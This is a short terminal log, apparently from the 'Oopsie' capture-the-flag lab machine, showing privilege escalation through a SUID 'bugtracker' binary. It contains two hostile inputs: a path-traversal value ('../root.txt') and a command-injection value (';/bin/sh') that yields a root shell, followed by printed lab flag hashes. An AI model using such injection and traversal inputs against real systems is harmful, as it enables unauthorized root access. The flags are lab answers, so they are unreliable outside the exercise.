www-data@oopsie:/tmp$ /usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied
www-data@oopsie:/tmp$ su - robert
Password: 
robert@oopsie:~$ whoami
robert
robert@oopsie:~$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:~$ /usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ../root.txt
---------------

af13b0bee69f8a877c3faf667f7beacf

# Or

robert@oopsie:~$ /usr/bin/bugtracker 

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ;/bin/sh
---------------

cat: /root/reports/: Is a directory
# whoami
root
# cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
# cd root
/bin/sh: 5: cd: can't cd to root
# pwd
/home/robert
# cd  /root
# ls
reports  root.txt
# cat root.txt
af13b0bee69f8a877c3faf667f7beacf

